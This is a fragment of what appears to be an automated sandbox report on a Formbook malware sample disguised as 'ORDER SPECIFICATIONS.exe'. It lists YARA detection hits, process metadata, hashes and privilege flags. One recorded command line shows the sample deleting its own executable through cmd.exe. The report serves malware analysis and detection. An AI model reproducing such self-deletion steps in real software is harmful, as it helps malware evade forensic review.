                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 5308 Parent PID: 6364

                                                                                      General

                                                                                      Start time:08:57:20
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
                                                                                      Imagebase:0x2c0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 5396 Parent PID: 5308

                                                                                      General

                                                                                      Start time:08:57:20
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >